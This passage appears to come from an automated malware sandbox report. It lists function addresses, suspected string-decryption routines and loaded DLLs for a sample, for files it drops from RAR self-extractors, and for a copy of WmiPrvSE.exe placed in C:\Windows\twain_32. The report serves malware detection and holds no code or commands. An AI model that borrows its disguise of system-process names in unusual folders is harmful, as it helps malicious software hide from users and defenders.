Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B97DDC	0_2_00B97DDC
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B82EB6	0_2_00B82EB6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009E92C6	3_2_009E92C6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F5011	3_2_009F5011
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A062A8	3_2_00A062A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F5282	3_2_009F5282
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F02F7	3_2_009F02F7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F8253	3_2_009F8253
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F13FD	3_2_009F13FD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A064D7	3_2_00A064D7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F742E	3_2_009F742E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F55B0	3_2_009F55B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A0E600	3_2_00A0E600
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F07A7	3_2_009F07A7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F88AF	3_2_009F88AF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009ED833	3_2_009ED833
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009E395A	3_2_009E395A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A0EAAE	3_2_00A0EAAE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009E4A8E	3_2_009E4A8E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A12BB4	3_2_00A12BB4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009EFCCC	3_2_009EFCCC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F7DDC	3_2_009F7DDC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009E2EB6	3_2_009E2EB6
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0561	4_2_00007FFD9B8A0561
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0598	4_2_00007FFD9B8A0598
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0588	4_2_00007FFD9B8A0588
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0590	4_2_00007FFD9B8A0590
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0518	4_2_00007FFD9B8A0518
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A04F8	4_2_00007FFD9B8A04F8
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0550	4_2_00007FFD9B8A0550
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8ADA70	4_2_00007FFD9B8ADA70
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8B1C90	4_2_00007FFD9B8B1C90
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0598	9_2_00007FFD9BAA0598
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0588	9_2_00007FFD9BAA0588
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0561	9_2_00007FFD9BAA0561
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0590	9_2_00007FFD9BAA0590
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0518	9_2_00007FFD9BAA0518
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA04F8	9_2_00007FFD9BAA04F8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0550	9_2_00007FFD9BAA0550
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAB1C90	9_2_00007FFD9BAB1C90
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAADA70	9_2_00007FFD9BAADA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BBF30C4	9_2_00007FFD9BBF30C4
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BCE3608	9_2_00007FFD9BCE3608
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BCE2E88	9_2_00007FFD9BCE2E88
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0598	15_2_00007FFD9BAD0598
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0588	15_2_00007FFD9BAD0588
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0561	15_2_00007FFD9BAD0561
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0590	15_2_00007FFD9BAD0590
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0518	15_2_00007FFD9BAD0518
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD04F8	15_2_00007FFD9BAD04F8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0550	15_2_00007FFD9BAD0550
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAE1C90	15_2_00007FFD9BAE1C90
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BADDA70	15_2_00007FFD9BADDA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BD1357A	15_2_00007FFD9BD1357A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BD12DFD	15_2_00007FFD9BD12DFD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0598	22_2_00007FFD9BAB0598
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0588	22_2_00007FFD9BAB0588
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0561	22_2_00007FFD9BAB0561
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0590	22_2_00007FFD9BAB0590
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0518	22_2_00007FFD9BAB0518
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB04F8	22_2_00007FFD9BAB04F8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0550	22_2_00007FFD9BAB0550
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAC1C90	22_2_00007FFD9BAC1C90
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BABDA70	22_2_00007FFD9BABDA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BC030C4	22_2_00007FFD9BC030C4
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BCF357A	22_2_00007FFD9BCF357A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BCF2DFD	22_2_00007FFD9BCF2DFD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAA0530	27_2_00007FFD9BAA0530
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAA0561	27_2_00007FFD9BAA0561
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAADA70	27_2_00007FFD9BAADA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAB45F0	27_2_00007FFD9BAB45F0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAB88DD	27_2_00007FFD9BAB88DD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAB3010	27_2_00007FFD9BAB3010
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAB39BC	27_2_00007FFD9BAB39BC
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAC33EE	27_2_00007FFD9BAC33EE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAC0041	27_2_00007FFD9BAC0041
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAC4138	27_2_00007FFD9BAC4138
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAC0A88	27_2_00007FFD9BAC0A88
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAC18CB	27_2_00007FFD9BAC18CB
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BACD418	27_2_00007FFD9BACD418
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BACCB91	27_2_00007FFD9BACCB91
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BACB651	27_2_00007FFD9BACB651
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BCE357A	27_2_00007FFD9BCE357A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BCE2DFD	27_2_00007FFD9BCE2DFD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0598	32_2_00007FFD9BAC0598
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0588	32_2_00007FFD9BAC0588
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0561	32_2_00007FFD9BAC0561
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0590	32_2_00007FFD9BAC0590
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0518	32_2_00007FFD9BAC0518
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC04F8	32_2_00007FFD9BAC04F8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0550	32_2_00007FFD9BAC0550
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAD1C90	32_2_00007FFD9BAD1C90
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BACDA70	32_2_00007FFD9BACDA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BD0357A	32_2_00007FFD9BD0357A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BD02DFD	32_2_00007FFD9BD02DFD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAD33EE	37_2_00007FFD9BAD33EE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAD0041	37_2_00007FFD9BAD0041
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAD4138	37_2_00007FFD9BAD4138
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAD0A88	37_2_00007FFD9BAD0A88
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAD18CB	37_2_00007FFD9BAD18CB
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BADD3C0	37_2_00007FFD9BADD3C0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BADCB91	37_2_00007FFD9BADCB91
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BADB651	37_2_00007FFD9BADB651
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAFAA9F	37_2_00007FFD9BAFAA9F
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB27A4	37_2_00007FFD9BAB27A4
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB05A0	37_2_00007FFD9BAB05A0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB8909	37_2_00007FFD9BAB8909
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB0530	37_2_00007FFD9BAB0530
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7011	37_2_00007FFD9BAB7011
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB47F3	37_2_00007FFD9BAB47F3
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB2FEA	37_2_00007FFD9BAB2FEA
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB43E3	37_2_00007FFD9BAB43E3
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7C57	37_2_00007FFD9BAB7C57
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB6048	37_2_00007FFD9BAB6048
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB542E	37_2_00007FFD9BAB542E
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB441E	37_2_00007FFD9BAB441E
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7776	37_2_00007FFD9BAB7776
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB6BDC	37_2_00007FFD9BAB6BDC
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB3BD9	37_2_00007FFD9BAB3BD9
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB57BE	37_2_00007FFD9BAB57BE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABA7AE	37_2_00007FFD9BABA7AE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB2BA8	37_2_00007FFD9BAB2BA8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB4BA6	37_2_00007FFD9BAB4BA6
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB8F0E	37_2_00007FFD9BAB8F0E
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7F4F	37_2_00007FFD9BAB7F4F
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABA748	37_2_00007FFD9BABA748
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB3F39	37_2_00007FFD9BAB3F39
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB4E81	37_2_00007FFD9BAB4E81
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABDA70	37_2_00007FFD9BABDA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7270	37_2_00007FFD9BAB7270
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB2665	37_2_00007FFD9BAB2665
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAC1ADC	37_2_00007FFD9BAC1ADC
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB2EAE	37_2_00007FFD9BAB2EAE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB121A	37_2_00007FFD9BAB121A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABA1FA	37_2_00007FFD9BABA1FA
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB8DF2	37_2_00007FFD9BAB8DF2
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB3DE7	37_2_00007FFD9BAB3DE7
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB1E53	37_2_00007FFD9BAB1E53
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB4E44	37_2_00007FFD9BAB4E44
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB4A41	37_2_00007FFD9BAB4A41
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB922C	37_2_00007FFD9BAB922C
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7597	37_2_00007FFD9BAB7597
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB1D92	37_2_00007FFD9BAB1D92
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB6965	37_2_00007FFD9BAB6965
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB35C7	37_2_00007FFD9BAB35C7
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB19CB	37_2_00007FFD9BAB19CB
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB2D0F	37_2_00007FFD9BAB2D0F
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB90F8	37_2_00007FFD9BAB90F8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB8D48	37_2_00007FFD9BAB8D48
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB993F	37_2_00007FFD9BAB993F
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABA48B	37_2_00007FFD9BABA48B
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB1479	37_2_00007FFD9BAB1479
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB9C6C	37_2_00007FFD9BAB9C6C
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABC069	37_2_00007FFD9BABC069
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB5861	37_2_00007FFD9BAB5861
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB68BE	37_2_00007FFD9BAB68BE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAC45F0	37_2_00007FFD9BAC45F0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAC88DD	37_2_00007FFD9BAC88DD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAC3010	37_2_00007FFD9BAC3010
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BACC3FB	37_2_00007FFD9BACC3FB
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAC39BC	37_2_00007FFD9BAC39BC
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BCF357A	37_2_00007FFD9BCF357A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BCF2DFD	37_2_00007FFD9BCF2DFD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAC0A88	42_2_00007FFD9BAC0A88
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAC0041	42_2_00007FFD9BAC0041
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAB45F0	42_2_00007FFD9BAB45F0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAAB699	42_2_00007FFD9BAAB699
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAAC069	42_2_00007FFD9BAAC069
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAC33EE	42_2_00007FFD9BAC33EE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BACB651	42_2_00007FFD9BACB651
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BACD544	42_2_00007FFD9BACD544
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BBF30C4	42_2_00007FFD9BBF30C4
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 47_2_00007FFD9BACD418	47_2_00007FFD9BACD418
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 47_2_00007FFD9BACB651	47_2_00007FFD9BACB651
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 47_2_00007FFD9BAB45F0	47_2_00007FFD9BAB45F0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 47_2_00007FFD9BAC33EE	47_2_00007FFD9BAC33EE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 47_2_00007FFD9BBF30C4	47_2_00007FFD9BBF30C4

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: String function: 009FFFD0 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: String function: 009FFEFC appears 42 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: String function: 00A007A0 appears 31 times
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: String function: 00B9FEFC appears 42 times
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: String function: 00B9FFD0 appears 56 times
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: String function: 00BA07A0 appears 31 times

Tries to load missing DLLs

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
